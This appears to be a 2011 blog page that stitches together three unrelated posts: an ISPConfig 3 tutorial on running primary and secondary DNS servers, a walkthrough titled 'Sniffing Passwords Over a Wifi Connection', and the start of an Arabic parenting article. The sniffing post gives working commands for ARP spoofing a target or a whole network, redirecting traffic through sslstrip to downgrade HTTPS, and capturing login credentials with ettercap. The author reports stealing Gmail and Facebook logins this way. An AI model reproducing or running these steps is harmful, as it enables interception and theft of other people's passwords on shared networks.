Monday, July 25, 2011

How To Run Your Own DNS Servers (Primary And Secondary) With ISPConfig 3 (Debian Squeeze)


This tutorial shows how you can run your own DNS servers (primary and secondary) with ISPConfig 3. To do this, you need two servers with two different public IP addresses and with ISPConfig 3 installed. I will use Debian Squeeze for both DNS servers here to demonstrate the base system setup process and ISPConfig 3 installation, but once you have ISPConfig 3 installed on your servers, the configuration inside ISPConfig 3 is identical, no matter what distribution you use.
I do not issue any guarantee that this will work for you!

1 Preliminary Note

Our current situation is as follows: we have
  • ISPConfig server #1 (server1.example.com): IP address 1.2.3.4; this one will be our primary name server.
  • ISPConfig server #2 (server2.example.com): IP address 1.2.3.5; this one will be our secondary name server.
server1.example.com will be a full ISPConfig 3 installation. It will be the master ISPConfig 3 server (which runs the ISPConfig control panel interface) and act as an email, web, DNS, and MySQL server (this is the most common setup - one server that has all the services). server2.example.com will be a slave ISPConfig 3 server (no ISPConfig control panel interface) and will act only as the secondary DNS server. Of course, you can split up services between your servers as you like - the tutorial Installing A Multiserver Setup With Dedicated Web, Email, DNS And MySQL Database Servers On Debian 5.0 With ISPConfig 3 should give you the idea.
DNS A records for server1.example.com and server2.example.com must already exist (you can create them through your domain registrar's control panel). We will use server1.example.com and server2.example.com as the name servers for our zones later on; if you prefer something like ns1.example.com and ns2.example.com instead of server1.example.com and server2.example.com, you can use these, but make sure that there are DNS A records for ns1.example.com and ns2.example.com as well (that point to the same IPs as server1.example.com or server2.example.com).
I will show how to create a zone for the domain mydomain.com - this domain must already be registered through a domain registrar. After I have created the mydomain.com zone and verified that both server1.example.com and server2.example.com serve all mydomain.com records correctly, I will show how to make server1.example.com and server2.example.com the authoritative name servers for mydomain.com (see chapter 8).
More details about how to create DNS zones/records can be found in chapters 4.8 and 5.12 of the ISPConfig 3 Manual.
 

2 Setting Up server1.example.com (Primary DNS)

server1.example.com:
Please set up server1.example.com as shown in The Perfect Server - Debian Squeeze (Debian 6.0) With BIND & Courier [ISPConfig 3], but stop before the ISPConfig 3 installation.
To allow the other MySQL instances to connect to the MySQL database on this node during ISPConfig 3 installation, we have to add MySQL root user records in the master database for every slave server hostname and IP address. Log into MySQL:
mysql -u root -p
On the MySQL shell, run the following queries:
CREATE USER 'root'@'1.2.3.5' IDENTIFIED BY 'yourrootsqlpassword';
GRANT ALL PRIVILEGES ON * . * TO 'root'@'1.2.3.5' IDENTIFIED BY 'yourrootsqlpassword' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;
CREATE USER 'root'@'server2.example.com' IDENTIFIED BY 'yourrootsqlpassword';
GRANT ALL PRIVILEGES ON * . * TO 'root'@'server2.example.com' IDENTIFIED BY 'yourrootsqlpassword' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;
FLUSH PRIVILEGES;
quit;
Make sure you replace 1.2.3.5 with the IP address and server2.example.com with the hostname of your secondary DNS server!
Now we can install ISPConfig 3 on server1.example.com as follows:
cd /tmp
wget http://www.ispconfig.org/downloads/ISPConfig-3-stable.tar.gz
tar xfz ISPConfig-3-stable.tar.gz
cd ispconfig3_install/install/
php -q install.php
root@server1:/tmp/ispconfig3_install/install# php -q install.php


--------------------------------------------------------------------------------
 _____ ___________   _____              __ _         ____
|_   _/  ___| ___ \ /  __ \            / _(_)       /__  \
  | | \ `--.| |_/ / | /  \/ ___  _ __ | |_ _  __ _    _/ /
  | |  `--. \  __/  | |    / _ \| '_ \|  _| |/ _` |  |_ |
 _| |_/\__/ / |     | \__/\ (_) | | | | | | | (_| | ___\ \
 \___/\____/\_|      \____/\___/|_| |_|_| |_|\__, | \____/
                                              __/ |
                                             |___/
--------------------------------------------------------------------------------


>> Initial configuration

Operating System: Debian 6.0 (Squeeze/Sid) or compatible

    Following will be a few questions for primary configuration so be careful.
    Default values are in [brackets] and can be accepted with <ENTER>.
    Tap in "quit" (without the quotes) to stop the installer.


Select language (en,de) [en]: <-- ENTER

Installation mode (standard,expert) [standard]: <-- expert

Full qualified hostname (FQDN) of the server, eg server1.domain.tld  [server1.example.com]: <-- ENTER

MySQL server hostname [localhost]: <-- ENTER

MySQL root username [root]: <-- ENTER

MySQL root password []: <-- yourrootsqlpassword

MySQL database to create [dbispconfig]: <-- ENTER

MySQL charset [utf8]: <-- ENTER

Shall this server join an existing ISPConfig multiserver setup (y,n) [n]: <-- ENTER

Adding ISPConfig server record to database.

Configure Mail (y,n) [y]: <-- ENTER

Configuring Postfix
Generating a 2048 bit RSA private key
............................................................................................+++
..........................+++
writing new private key to 'smtpd.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]: <-- ENTER
State or Province Name (full name) [Some-State]: <-- ENTER
Locality Name (eg, city) []: <-- ENTER
Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- ENTER
Organizational Unit Name (eg, section) []: <-- ENTER
Common Name (eg, YOUR name) []: <-- ENTER
Email Address []: <-- ENTER
Configuring SASL
Configuring PAM
Configuring Courier
Configuring Spamassassin
Configuring Amavisd
Configuring Getmail
Stopping Postfix Mail Transport Agent: postfix.
Starting Postfix Mail Transport Agent: postfix.
Stopping SASL Authentication Daemon: saslauthd.
Starting SASL Authentication Daemon: saslauthd.
Stopping amavisd: amavisd-new.
Starting amavisd: amavisd-new.
Stopping ClamAV daemon: clamd.
Starting ClamAV daemon: clamd Bytecode: Security mode set to "TrustSigned".
.
Stopping Courier authentication services: authdaemond.
Starting Courier authentication services: authdaemond.
Stopping Courier IMAP server: imapd.
Starting Courier IMAP server: imapd.
Stopping Courier IMAP-SSL server: imapd-ssl.
Starting Courier IMAP-SSL server: imapd-ssl.
Stopping Courier POP3 server: pop3d.
Starting Courier POP3 server: pop3d.
Stopping Courier POP3-SSL server: pop3d-ssl.
Starting Courier POP3-SSL server: pop3d-ssl.
Configure Jailkit (y,n) [y]: <-- ENTER

Configuring Jailkit
Configure FTP Server (y,n) [y]: <-- ENTER

Configuring Pureftpd
Restarting ftp server: Running: /usr/sbin/pure-ftpd-mysql-virtualchroot -l mysql:/etc/pure-ftpd/db/mysql.conf -l pam -Y 1 -8 UTF-8 -H -D -b -O clf:/var/log/pure-ftpd/transfer.log -E -u 1000 -A -B
Configure DNS Server (y,n) [y]: <-- ENTER

Configuring BIND

Hint: If this server shall run the ISPConfig interface, select 'y' in the 'Configure Apache Server' option.

Configure Apache Server (y,n) [y]: <-- ENTER

Configuring Apache
Configuring Vlogger
Configuring Apps vhost
Configure Firewall Server (y,n) [y]: <-- ENTER

Configuring Firewall
Install ISPConfig Web Interface (y,n) [y]: <-- ENTER

Installing ISPConfig
ISPConfig Port [8080]: <-- ENTER

Enable SSL for the ISPConfig web interface (y,n) [y]: <-- ENTER

Generating RSA private key, 4096 bit long modulus
.................................................................................................................++
..................................++
e is 65537 (0x10001)
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]: <-- ENTER
State or Province Name (full name) [Some-State]: <-- ENTER
Locality Name (eg, city) []: <-- ENTER
Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- ENTER
Organizational Unit Name (eg, section) []: <-- ENTER
Common Name (eg, YOUR name) []: <-- ENTER
Email Address []: <-- ENTER

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []: <-- ENTER
An optional company name []: <-- ENTER
writing RSA key
Configuring DBServer
Installing ISPConfig crontab
no crontab for root
no crontab for getmail
Restarting web server: apache2 ... waiting .
Installation completed.
root@server1:/tmp/ispconfig3_install/install#

If you have chosen to enable SSL for the ISPConfig web interface, you can reach the ISPConfig web interface at https://server1.example.com:8080, otherwise at http://server1.example.com:8080.


3 Setting Up server2.example.com (Secondary DNS)

 
server2.example.com:
server2.example.com can be set up according to chapter 6 from the tutorial Installing A Multiserver Setup With Dedicated Web, Email, DNS And MySQL Database Servers On Debian 5.0 With ISPConfig 3. I will repeat these steps here:
apt-get -y install ntp ntpdate
apt-get -y install mysql-client mysql-server
New password for the MySQL "root" user: <-- yourrootsqlpassword
Repeat password for the MySQL "root" user: <-- yourrootsqlpassword
apt-get -y install php5-cli php5-mysql php5-mcrypt mcrypt
apt-get -y install bind9 dnsutils
ISPConfig 3 can now be installed as follows:
cd /tmp
wget http://www.ispconfig.org/downloads/ISPConfig-3-stable.tar.gz
tar xfz ISPConfig-3-stable.tar.gz
cd ispconfig3_install/install/
php -q install.php
root@server2:/tmp/ispconfig3_install/install# php -q install.php


--------------------------------------------------------------------------------
 _____ ___________   _____              __ _         ____
|_   _/  ___| ___ \ /  __ \            / _(_)       /__  \
  | | \ `--.| |_/ / | /  \/ ___  _ __ | |_ _  __ _    _/ /
  | |  `--. \  __/  | |    / _ \| '_ \|  _| |/ _` |  |_ |
 _| |_/\__/ / |     | \__/\ (_) | | | | | | | (_| | ___\ \
 \___/\____/\_|      \____/\___/|_| |_|_| |_|\__, | \____/
                                              __/ |
                                             |___/
--------------------------------------------------------------------------------


>> Initial configuration

Operating System: Debian 6.0 (Squeeze/Sid) or compatible

    Following will be a few questions for primary configuration so be careful.
    Default values are in [brackets] and can be accepted with <ENTER>.
    Tap in "quit" (without the quotes) to stop the installer.


Select language (en,de) [en]: <-- ENTER

Installation mode (standard,expert) [standard]: <-- expert

Full qualified hostname (FQDN) of the server, eg server1.domain.tld  [server2.example.com]: <-- ENTER

MySQL server hostname [localhost]: <-- ENTER

MySQL root username [root]: <-- ENTER

MySQL root password []: <-- yourrootsqlpassword

MySQL database to create [dbispconfig]: <-- ENTER

MySQL charset [utf8]: <-- ENTER

Shall this server join an existing ISPConfig multiserver setup (y,n) [n]: <-- y

MySQL master server hostname []: <-- server1.example.com

MySQL master server root username [root]: <-- ENTER

MySQL master server root password []: <-- yourrootsqlpassword_on_server1.example.com

MySQL master server database name [dbispconfig]: <-- name_of_ispconfig_database_on_server1.example.com

Adding ISPConfig server record to database.

Configure Mail (y,n) [y]: <-- n

Configure Jailkit (y,n) [y]: <-- n

Configure FTP Server (y,n) [y]: <-- n

Configure DNS Server (y,n) [y]: <-- ENTER

Configuring BIND

Hint: If this server shall run the ISPConfig interface, select 'y' in the 'Configure Apache Server' option.

Configure Apache Server (y,n) [y]: <-- n

Configure Firewall Server (y,n) [y]: <-- ENTER

Configuring Firewall
Install ISPConfig Web Interface (y,n) [y]: <-- n

Configuring DBServer
Installing ISPConfig crontab
no crontab for root
Installation completed.
root@server2:/tmp/ispconfig3_install/install#


4 Configuring server2.example.com To Be A Mirror Of server1.example.com

Now open the ISPConfig 3 control panel (http(s)://server1.example.com:8080) and go to System > Server Services. Select server2.example.com:


Make sure that the DNS-Server checkbox is checked and select server1.example.com in the Is mirror of Server selectbox and click on Save:



5 Creating A DNS Zone

To create a DNS zone, it is recommended to use the DNS Wizard (DNS > DNS Wizard > Add DNS Zone or click on the Add new DNS Zone with Wizard button) which will automatically create a set of common DNS records for your domain (like www, mail, ns records, etc.):


This will bring you to the wizard to create a new DNS zone. The form has the following fields:
  • Template: This refers to the templates that exist under DNS > DNS Wizard > Templates. These templates define what records will be created by default if you use the DNS Wizard. Let's assume we create a zone for the domain mydomain.com - the Default template will create A records for mydomain.com, www.mydomain.com, and mail.mydomain.com, two NS (nameserver) records, plus an MX (mail exchanger) record for mydomain.com that points to mail.mydomain.com.
  • Server: Select server1.example.com here.
  • Client: Here you select the client that owns the new DNS zone.
  • Domain: Fill in the domain for which you want to create the zone, e.g. mydomain.com - please note that you don't need a dot at the end, i.e., mydomain.com. would work as well, but mydomain.com (without the trailing dot) is sufficient.
  • IP Address: Fill in the IP address that mydomain.com should point to - please note that www.mydomain.com and mail.mydomain.com will also point to that IP address (you can change that later on under DNS > DNS > Zones).
  • NS 1: Specify the hostname of the primary nameserver for the domain, server1.example.com. Again, no trailing dot is needed. The server you specify here must point or be identical to the server that you selected in the Server field.
  • NS 2: Specify the hostname of the secondary nameserver for the domain, server2.example.com. Again, no trailing dot is needed.
  • Email: Specify the email address of the zone administrator, e.g. zonemaster@example.com.
Click on Create DNS Record to create the zone:


Afterwards you can find the new zone in the list under DNS > DNS > Zones:


From the list view, it is possible to delete the DNS zone.
If you edit the zone and go to the Records tab, you will see the records that have automatically been created by the DNS Wizard (the Default template will create A records for mydomain.com, www.mydomain.com, and mail.mydomain.com, two NS (nameserver) records, plus an MX (mail exchanger) record for mydomain.com that points to mail.mydomain.com):


On the Records tab, you can edit or delete existing records and add further ones.

6 Testing

 
Now let's test if the zone and its records have been created on both server1.example.com and server2.example.com, and if they are served correctly. We can use the dig tool for it. You can run the following commands on any server (server1.example.com, server2.example.com, or any other server):
dig @server1.example.com any mydomain.com
This command asks server1.example.com to serve all records that it has for mydomain.com:
root@server1:~# dig @server1.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server1.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45584
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071901 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 0 msec
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Tue Jul 19 14:09:38 2011
;; MSG SIZE  rcvd: 182

root@server1:~#
If we check server2.example.com, it should return the same records:
dig @server2.example.com any mydomain.com
root@server1:~# dig @server2.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server2.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5183
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071901 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 0 msec
;; SERVER: 1.2.3.5#53(1.2.3.5)
;; WHEN: Tue Jul 19 14:10:07 2011
;; MSG SIZE  rcvd: 182

root@server1:~#
You can do the same for www.mydomain.com and mail.mydomain.com and any other hostname you have created, e.g.:
dig @server1.example.com any www.mydomain.com
dig @server2.example.com any www.mydomain.com
dig @server1.example.com any mail.mydomain.com
dig @server2.example.com any mail.mydomain.com
This means our primary/secondary DNS setup is working as expected!

7 Creating Further Records

Let's create an SPF record for demonstration purposes. An SPF record is a TXT record, so we click on the TXT button on the Records tab of the mydomain.com zone.
The form contains the following fields:
  • Hostname: The name that this record describes. This field can contain an FQDN or just a hostname. If you specify an FQDN, the name must end with a dot; if you specify just a hostname, it must not end with a dot. Fill in mydomain.com. here (if you forget the dot at the end, the hostname would translate to mydomain.com.mydomain.com.).
  • Text: You can use the SPF wizard at http://old.openspf.org/ to find out what to fill in here (e.g. v=spf1 a mx ptr -all).
  • TTL: The time interval (in seconds) that this record may be cached before the source of the information should again be consulted. Zero values are interpreted to mean that the record can only be used for the transaction in progress, and should not be cached.
  • Active: This defines whether this TXT record is active or not.


Wait a few minutes, and then test if the record has been created on both server1.example.com and server2.example.com:
dig @server1.example.com any mydomain.com
root@server1:~# dig @server1.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server1.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23141
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      TXT     "v=spf1 a mx ptr -all"
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071903 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 0 msec
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Tue Jul 19 14:23:19 2011
;; MSG SIZE  rcvd: 215

root@server1:~#
dig @server2.example.com any mydomain.com
root@server1:~# dig @server2.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server2.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13876
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      TXT     "v=spf1 a mx ptr -all"
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071903 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 1 msec
;; SERVER: 1.2.3.5#53(1.2.3.5)
;; WHEN: Tue Jul 19 14:23:36 2011
;; MSG SIZE  rcvd: 215

root@server1:~#
More details about how to create DNS zones/records can be found in chapters 4.8 and 5.12 of the ISPConfig 3 Manual.
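The comparison done by eye in chapters 6 and 7, as an added shell example (not part of the original tutorial): it parses saved dig replies from both name servers and reports a server that is not authoritative, a secondary whose SOA serial lags behind the primary, or record sets that differ. The sample replies are constructed in the output format shown above, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: compare saved "dig @<server> any <zone>" replies from two name servers.
# The three replies below are constructed samples, trimmed to the lines the checks read.

PRIMARY=';; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      TXT     "v=spf1 a mx ptr -all"
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071903 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214'

# Same zone version, NS records returned in a different order.
SECONDARY_OK=';; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      TXT     "v=spf1 a mx ptr -all"
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071903 28800 7200 604800 86400'

# Secondary that has not yet picked up the new TXT record (older serial).
SECONDARY_STALE=';; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071901 28800 7200 604800 86400'

# $1 = dig reply. Prints the answer-section records except SOA, whitespace-normalized
# and sorted, so that record order (e.g. rotating NS records) does not matter.
answer_records() {
  printf '%s\n' "$1" | awk '
    /^;; ANSWER SECTION:/    { in_answer = 1; next }
    /^;/ || /^$/             { in_answer = 0; next }
    in_answer && $4 != "SOA" { $1 = $1; print }
  ' | LC_ALL=C sort
}

# $1 = dig reply. Prints the SOA serial (7th field of the SOA record).
soa_serial() {
  printf '%s\n' "$1" | awk '$4 == "SOA" { print $7; exit }'
}

# $1 = dig reply, $2 = header flag (aa, ra, ...). Succeeds if the flag is set.
has_flag() {
  printf '%s\n' "$1" | awk -v want="$2" '
    /^;; flags:/ { sub(/^;; flags:/, ""); sub(/;.*/, "")
                   n = split($0, f, " ")
                   for (i = 1; i <= n; i++) if (f[i] == want) found = 1 }
    END { exit !found }'
}

# $1, $2 = record lists from answer_records. Prints records present on one side only.
record_diff() {
  { printf '%s\n' "$1" | sed 's/^/primary-only: /'
    printf '%s\n' "$2" | sed 's/^/secondary-only: /'; } |
  awk '{ side = $1; sub(/^[^:]*: /, ""); count[$0]++; where[$0] = side }
       END { for (r in count) if (count[r] == 1 && r != "") print where[r], r }' |
  LC_ALL=C sort
}

# $1 = primary reply, $2 = secondary reply. Prints findings; returns 1 on any FAIL.
compare_ns() {
  rc=0
  for side in primary secondary; do
    if [ "$side" = primary ]; then reply=$1; else reply=$2; fi
    has_flag "$reply" aa || { echo "FAIL not-authoritative $side"; rc=1; }
    # "ra" means the server offered recursion to the client that asked; repeat the
    # query from an outside host to see whether strangers get recursion as well.
    if has_flag "$reply" ra; then echo "WARN recursion-available $side"; fi
  done
  ps=$(soa_serial "$1"); ss=$(soa_serial "$2")
  [ "$ps" = "$ss" ] || { echo "FAIL serial-mismatch primary=$ps secondary=$ss"; rc=1; }
  d=$(record_diff "$(answer_records "$1")" "$(answer_records "$2")")
  [ -z "$d" ] || { echo "FAIL records-differ"; echo "$d"; rc=1; }
  return $rc
}

compare_ns "$PRIMARY" "$SECONDARY_STALE" || echo "name servers are out of sync"
```

With live servers, the two arguments would be the captured output of the dig commands from chapter 6.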

8 Setting server1.example.com And server2.example.com As The Authoritative Name Servers For mydomain.com

Now that everything is working as expected, we want server1.example.com and server2.example.com to be the "official" (=authoritative) name servers for mydomain.com. When you register a domain at your domain registrar, it automatically uses DNS servers of your domain registrar (unless you specify your own name servers) which means if other hosts try to resolve your domain, the DNS servers of your domain registrar will be queried instead of your ISPConfig DNS servers.
To change that, go to your domain registrar's control panel, select your domain, and set your ISPConfig DNS servers as the authoritative name servers for the domain (this is a screenshot from the ResellerClub control panel; other domain registrars have similar control panels):


Please note that you should do this only after you have created the appropriate DNS records on your ISPConfig servers because some registries will complain if they do not find records for the domain on the new authoritative name servers.
If you register a new domain and want to use your ISPConfig servers as the authoritative DNS servers for the domain, you should first create the zone for the domain on the ISPConfig servers and then, while you register the domain, specify the ISPConfig servers as the authoritative name servers. That way your new domain uses the ISPConfig servers from the start on.



Sniffing Passwords Over a Wifi Connection [Linux]

Now here's where some fun stuff starts!
I hope many of you have followed my installing Backtrack 5 guide and read up on what ARP is as well as basic Linux commands so you can follow along easily; if not, go read those now!

What you'll need for this tutorial:

If you don't have any of these, follow the links and set up your system before continuing.

Okay, so what we're doing today is using a few programs to sniff passwords over a network and redirect secure HTTPS connections to non-secure HTTP connections to help us get even more passwords.
I've successfully gotten passwords and user names from Gmail, Facebook, Ureddit, Reddit, and Youtube; but all sites should work.

Be warned, this is a beta post so it will be quite simple and unexplained, so it might be hard to understand for the newer Netsec and Linux users. I'll try to make it as easy to understand as possible in the future.

Let's begin:
  • First, we need to figure out the IP address of the user we want to sniff, and the gateway IP (usually 192.168.0.1 or 192.168.1.1 depending on the network)
    • You should have SOME experience with finding users on a network, but if you don't, you can use a program that comes on Backtrack 5 called "Kismet" to identify users, or copy and paste a hand-written script that I created:

      #!/bin/bash
      # brace expansion ({0..1}) needs bash, not plain sh

      echo "Computers connected to your network:"
      for dom in {0..1}; do # for loop for the domain
        for ip in {0..1}; do # for loop for the inner IP
          ping -c 1 192.168.$dom.$ip >>ips.tmp & # pings each IP in range and places the output in "ips.tmp"
        done # finishes inner for loop
      done # finishes outer for loop
      wait # lets the background pings finish before ips.tmp is read

      cat ips.tmp |grep "bytes from" |cut -d" " -f4 |cut -d: -f1 >>ips2.tmp # places specific pinged information into "ips2.tmp"

      cat ips2.tmp # outputs that information

      rm ips.tmp # cleans up temp files
      rm ips2.tmp # cleans up temp files


      Copy this into a file called "pingscan.sh" and run the command "chmod 775 pingscan.sh"
      Then you can run it with the command "./pingscan.sh" and it should output all connected IPs. The first one (lowest number at the end, such as 192.168.0.1) is the gateway, so remember what number that is.
      You can figure out what yours is by doing our good old friend "ifconfig" and looking at your IP address. You can then figure out which ones are other computers and choose which one you wish to directly sniff.
       This is a simple script that I wrote to ping nodes in your network and you can further add more to it by nmapping said nodes. I will write a post soon about this script and we will add more cool and interesting features to it to suit our needs. 
  • What we have to do is flip our computer into "forwarding" mode which allows us to forward packets along to other computers. Issue the command: "echo 1 > /proc/sys/net/ipv4/ip_forward" which places "1" (true or allow in computer language) into the file "ip_forward" with the ">" operator.

  • Next, we have to set up our "iptables" to redirect HTTP (normal) traffic to our program sslstrip.
     Issue the command "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666"

     I'm using the port 666 because it's easy to remember, but you can use any port that isn't already being used. You probably already know that port 80 is for HTTP traffic, so you can understand why the "destination port" is that. I'll explain the rest later, so don't worry if it doesn't make sense, just check back later!

  • Now we have to run SSLStrip to strip any HTTPS connections and redirect them to HTTP (unsecure) connections. The name SSLStrip is quite perfect, eh?

     To start SSLStrip on my computer, I have to navigate to the SSLStrip folder with the command "cd /pentest/web/sslstrip" first, then issue the command "python sslstrip.py -l 666" to run the program.
    This runs the python script file that starts the program. Python is a scripting language like Perl or Ruby and we will learn about it more in the future. If you're interested in Netsec and want to learn a programming language on your own, definitely check out Python and Perl to start.

    Don't close this terminal.

  • We have to ARP spoof or ARP poison our target computer. We learned about ARP here, and if you haven't read it already, go do so before continuing.
    Open a new terminal now for our ARP spoofing, and run the command:
    "arpspoof -i [your interface] -t [target computer ip address such as 192.168.0.111] [gateway ip address such as 192.168.0.1]"

     When I'm arp-spoofing my computer from my laptop, my command is "arpspoof -i wlan0 -t 192.168.0.111 192.168.0.1"

    If you want to arp-spoof the ENTIRE network, issue the command "arpspoof -i [interface] [gateway IP]".
    Thanks to Volvox for the above hint, but watch out, because if your computer can't handle all the redirecting the network requires, it will DoS (denial of service) the network.

    Don't close this terminal.

  •  Now open another terminal and let's start Ettercap! We will be using it in text mode today because I personally like it better (it feels less script-kiddie like and easier to navigate/issue commands).

    Run the command "ettercap -m [any_file_name.txt] -Tq -i [interface]" and a text interface will come up telling you a bunch of information (I'll post what mine looks like soon).

    I forgot to mention: in the Ettercap text interface, you have to press the space bar to show the packets coming in... do this and then, if there's any navigation on the target computer, you should see the packets start appearing rapidly across your screen.
    Hopefully you're doing this legally on your own network so you can test this out... Open up a browser on your target computer and go to mail.google.com and try to log in. It should redirect you to the HTTP version (but to a normal person, this won't be noticeable). Log in with your credentials and you should see something pop up in Ettercap that looks like a packet from Gmail. If it's scrolling too fast (which happens), then don't worry, I'll show you how to open up your file.

  • Open a new terminal while Ettercap is running (don't close it!) and issue the command "cat [your_file_name.txt]"
     Now you can see all the information that was printed at first, and at the bottom there should be some sniffed data if all went well (I'll post a screen-shot later).
    Let's clean this up a bit. Issue the command "cat [your_file_name.txt] |grep USER |cut -d" " -f3-12"
    The quotation marks after the d should be normal, but of course the ones surrounding the entire command are not.
    You should see your data cleaned up quite a bit. I'll run through what that command did later, but I hope you understand some of this for now.
Again, this is a first beta post that I just wanted to get out; I'll be updating it frequently with more information and work-arounds so don't worry if it's not working right away! Post below if you have any issues so I can add it in, too! 

Thursday, July 21, 2011

طفلك المشاكس.. خطوات للتعامل





كتبت- غادة الترساوي:

كثيرا ما يتساءل الوالدان عن الطريقة المثلى التي تمكنهما من التعامل مع طفلهما المشاكس ومساعدته على تجنب السلوك غير المقبول الذي يصدر عنه، ولعل أكثر الطرق شيوعاً هو اللجوء للعقاب البدني أو النفسي والذي ثبت فشله في إحداث التغيير المطلوب في سلوك الطفل ..
ولكن وقبل أن نتحدث عن الوسائل المثلى علينا أولا أن ننبه الوالدين أن المشاكسة ليست طفرة نوعية في سجلات أطفالهم، بل هي ظاهرة طبيعية لنتائج التربية غير الموجهة وعدم معرفة تطور الطفل العقلي، ونلفت إلى أن الطفل المشاكس يملك إدراكا غير الذي يملكه الطفل الهادئ، ونسبة الذكاء تتفاوت بينهما علما بأن الأرضية صحيحة عند الاثنين.. وإن كان إدراكهما سليما وصحيحا إلا أن الطفل المشاكس يتجاوز أحيانا مرحلته العمرية بنسب طفيفة فيبدو ذكيا جدا .
